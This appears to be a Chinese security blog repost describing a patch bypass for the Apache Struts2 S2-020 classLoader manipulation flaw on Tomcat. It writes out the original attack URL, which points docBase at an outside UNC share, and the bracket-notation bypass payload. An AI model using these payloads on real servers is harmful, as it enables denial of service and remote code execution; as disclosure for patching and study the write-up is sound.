- A+
所属分类:Seay信息安全博客
显示不全请点击全屏阅读
之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!
暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat利用方式:
http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test
绕过方式是:
http://localhost:8080/Struts2/test.action?class[“classLoader”][“resources”][“dirContext”][“docBase”]=xxxxx
顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。
作者:园长MM
原文:http://zone.wooyun.org/content/11876
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡